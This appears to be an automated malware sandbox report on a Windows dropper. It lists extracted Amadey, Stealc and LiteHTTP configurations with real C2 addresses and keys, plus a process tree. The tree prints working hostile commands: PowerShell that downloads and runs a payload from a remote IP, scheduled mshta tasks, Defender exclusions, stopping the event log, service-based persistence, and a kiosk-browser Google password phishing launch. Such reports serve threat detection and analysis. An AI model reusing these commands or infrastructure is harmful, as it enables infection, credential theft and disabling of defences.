Overview

overview

10

Static

static

3

899a16f7c6...a1.exe

windows7-x64

10

899a16f7c6...a1.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 19:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe

  • Size

    1.8MB

  • MD5

    6b38db8d1cadb7a58f0bd9f9d281646a

  • SHA1

    f56be70672c257dc68cfb0b9a0781569070b122b

  • SHA256

    899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1

  • SHA512

    6ac8fbbd65da962674112f1ec89fe62c9ceb470e9c6fb7fdd9f1654d8f501b71bc6409fd08b43d8f38d2229ce1964bcbc14ae7ccbad0613a51943d9631fe20ca

  • SSDEEP

    49152:DerWqI+PXK2ZRVtlhQXXPjeDXDrC7bbnh:DeCqXa2ZRVJo2X3C7bbh

Score
10/10
amadeygcleanerhealerlitehttpstealc092155trumpbotcredential_accessdefense_evasiondiscoverydropperevasionexecutionloaderpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

    stealerbotlitehttp
  • Litehttp family
    litehttp
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Downloads MZ/PE file 23 IoCs
  • Stops running service(s) 4 TTPs
    defense_evasionexecution
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 30 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 33 IoCs
  • Identifies Wine through registry keys 2 TTPs 15 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 54 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3424
      • C:\Users\Admin\AppData\Local\Temp\899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
        "C:\Users\Admin\AppData\Local\Temp\899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3252
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4952
          • C:\Users\Admin\AppData\Local\Temp\10105750101\60a8fbaed9.exe
            "C:\Users\Admin\AppData\Local\Temp\10105750101\60a8fbaed9.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:2204
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c schtasks /create /tn RytEemaFiDr /tr "mshta C:\Users\Admin\AppData\Local\Temp\8pm8HbqHd.hta" /sc minute /mo 25 /ru "Admin" /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2172
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn RytEemaFiDr /tr "mshta C:\Users\Admin\AppData\Local\Temp\8pm8HbqHd.hta" /sc minute /mo 25 /ru "Admin" /f
                6⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:916
            • C:\Windows\SysWOW64\mshta.exe
              mshta C:\Users\Admin\AppData\Local\Temp\8pm8HbqHd.hta
              5⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2420
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'I4L0CCTBT6ZJ0KBG7NNF0U5C5BCL8XSX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4240
                • C:\Users\Admin\AppData\Local\TempI4L0CCTBT6ZJ0KBG7NNF0U5C5BCL8XSX.EXE
                  "C:\Users\Admin\AppData\Local\TempI4L0CCTBT6ZJ0KBG7NNF0U5C5BCL8XSX.EXE"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4712
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10105760121\am_no.cmd" "
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4248
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 2
              5⤵
              • System Location Discovery: System Language Discovery
              • Delays execution with timeout.exe
              PID:4620
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4564
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:316
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5008
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4852
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:916
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4936
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "sNP4rmawND0" /tr "mshta \"C:\Temp\9kdXw5VUr.hta\"" /sc minute /mo 25 /ru "Admin" /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:4312
            • C:\Windows\SysWOW64\mshta.exe
              mshta "C:\Temp\9kdXw5VUr.hta"
              5⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2684
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5004
                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:372
          • C:\Users\Admin\AppData\Local\Temp\10106150101\0763c032e6.exe
            "C:\Users\Admin\AppData\Local\Temp\10106150101\0763c032e6.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:4448
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              5⤵
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              PID:4312
          • C:\Users\Admin\AppData\Local\Temp\10106160101\e9e682e5e5.exe
            "C:\Users\Admin\AppData\Local\Temp\10106160101\e9e682e5e5.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4160
            • C:\Users\Admin\AppData\Local\Temp\10106160101\e9e682e5e5.exe
              "C:\Users\Admin\AppData\Local\Temp\10106160101\e9e682e5e5.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4908
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 812
              5⤵
              • Program crash
              PID:624
          • C:\Users\Admin\AppData\Local\Temp\10106170101\0b3b203683.exe
            "C:\Users\Admin\AppData\Local\Temp\10106170101\0b3b203683.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2800
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              5⤵
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              PID:4968
          • C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe
            "C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Drops startup file
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4520
          • C:\Users\Admin\AppData\Local\Temp\10106200101\bc51f7167e.exe
            "C:\Users\Admin\AppData\Local\Temp\10106200101\bc51f7167e.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3792
          • C:\Users\Admin\AppData\Local\Temp\10106210101\2641042f41.exe
            "C:\Users\Admin\AppData\Local\Temp\10106210101\2641042f41.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3872
            • C:\Users\Admin\AppData\Local\Temp\0DHHOLEQLRA7GA1T5A2QCT.exe
              "C:\Users\Admin\AppData\Local\Temp\0DHHOLEQLRA7GA1T5A2QCT.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5324
          • C:\Users\Admin\AppData\Local\Temp\10106220101\500022f4be.exe
            "C:\Users\Admin\AppData\Local\Temp\10106220101\500022f4be.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3672
          • C:\Users\Admin\AppData\Local\Temp\10106230101\3c90caadc1.exe
            "C:\Users\Admin\AppData\Local\Temp\10106230101\3c90caadc1.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:1756
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5136
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3964
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1840
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4148
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3456
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              5⤵
                PID:5252
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  6⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of SetWindowsHookEx
                  PID:5216
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 27376 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {41850ed3-5204-4521-8f6d-431cce77b14e} 5216 "\\.\pipe\gecko-crash-server-pipe.5216" gpu
                    7⤵
                      PID:624
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2432 -prefsLen 28296 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ccf9fc5-92bd-414e-b1bc-aad14f040b00} 5216 "\\.\pipe\gecko-crash-server-pipe.5216" socket
                      7⤵
                        PID:4320
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3280 -childID 1 -isForBrowser -prefsHandle 3300 -prefMapHandle 3296 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {86792c43-8b9c-4d47-ad6c-0fe7c0fcc4a5} 5216 "\\.\pipe\gecko-crash-server-pipe.5216" tab
                        7⤵
                          PID:5608
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2708 -childID 2 -isForBrowser -prefsHandle 3888 -prefMapHandle 3884 -prefsLen 32786 -prefMapSize 244628 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6fa8dbfb-2482-4bf5-91ff-52a6e1c123f1} 5216 "\\.\pipe\gecko-crash-server-pipe.5216" tab
                          7⤵
                            PID:5768
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4500 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 2800 -prefMapHandle 4484 -prefsLen 32786 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6271c62e-265b-4727-9feb-26be12bebfac} 5216 "\\.\pipe\gecko-crash-server-pipe.5216" utility
                            7⤵
                            • Checks processor information in registry
                            PID:5068
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5404 -childID 3 -isForBrowser -prefsHandle 5408 -prefMapHandle 5412 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {69508615-9fb0-4e32-8083-3faf98616999} 5216 "\\.\pipe\gecko-crash-server-pipe.5216" tab
                            7⤵
                              PID:6072
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5548 -childID 4 -isForBrowser -prefsHandle 5556 -prefMapHandle 5560 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {726a02a8-0211-45cb-82f9-b92f21342f73} 5216 "\\.\pipe\gecko-crash-server-pipe.5216" tab
                              7⤵
                                PID:4716
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5740 -childID 5 -isForBrowser -prefsHandle 5748 -prefMapHandle 5752 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac816515-0cdf-4b67-8ff1-8555475f9754} 5216 "\\.\pipe\gecko-crash-server-pipe.5216" tab
                                7⤵
                                  PID:232
                          • C:\Users\Admin\AppData\Local\Temp\10106240101\1566acddfa.exe
                            "C:\Users\Admin\AppData\Local\Temp\10106240101\1566acddfa.exe"
                            4⤵
                            • Modifies Windows Defender DisableAntiSpyware settings
                            • Modifies Windows Defender Real-time Protection settings
                            • Modifies Windows Defender TamperProtection settings
                            • Modifies Windows Defender notification settings
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Windows security modification
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3936
                          • C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe
                            "C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe"
                            4⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5188
                          • C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe
                            "C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe"
                            4⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            PID:2280
                          • C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe
                            "C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe"
                            4⤵
                            • Executes dropped EXE
                            • Drops file in System32 directory
                            PID:6576
                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious use of AdjustPrivilegeToken
                              PID:6496
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                              5⤵
                                PID:6768
                                • C:\Windows\system32\wusa.exe
                                  wusa /uninstall /kb:890830 /quiet /norestart
                                  6⤵
                                    PID:7156
                                • C:\Windows\system32\powercfg.exe
                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                  5⤵
                                  • Power Settings
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:6792
                                • C:\Windows\system32\powercfg.exe
                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                  5⤵
                                  • Power Settings
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:6812
                                • C:\Windows\system32\powercfg.exe
                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                  5⤵
                                  • Power Settings
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:6820
                                • C:\Windows\system32\powercfg.exe
                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                  5⤵
                                  • Power Settings
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:6832
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe delete "DWENDQPG"
                                  5⤵
                                  • Launches sc.exe
                                  PID:6844
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"
                                  5⤵
                                  • Launches sc.exe
                                  PID:7064
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop eventlog
                                  5⤵
                                  • Launches sc.exe
                                  PID:7120
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe start "DWENDQPG"
                                  5⤵
                                  • Launches sc.exe
                                  PID:7132
                              • C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe
                                "C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:3136
                                • C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:2680
